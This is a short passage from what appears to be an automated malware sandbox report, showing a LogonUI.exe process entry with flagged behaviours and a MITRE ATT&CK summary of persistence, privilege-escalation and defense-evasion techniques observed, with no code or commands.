C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3fd5055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1592
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (3)
  - Registry Run Keys / Startup Folder (2)
  - Winlogon Helper DLL (1)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (3)
  - Registry Run Keys / Startup Folder (2)
  - Winlogon Helper DLL (1)
- Scheduled Task/Job (1)
Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Modify Registry (3)
- Pre-OS Boot (1)
  - Bootkit (1)
Downloads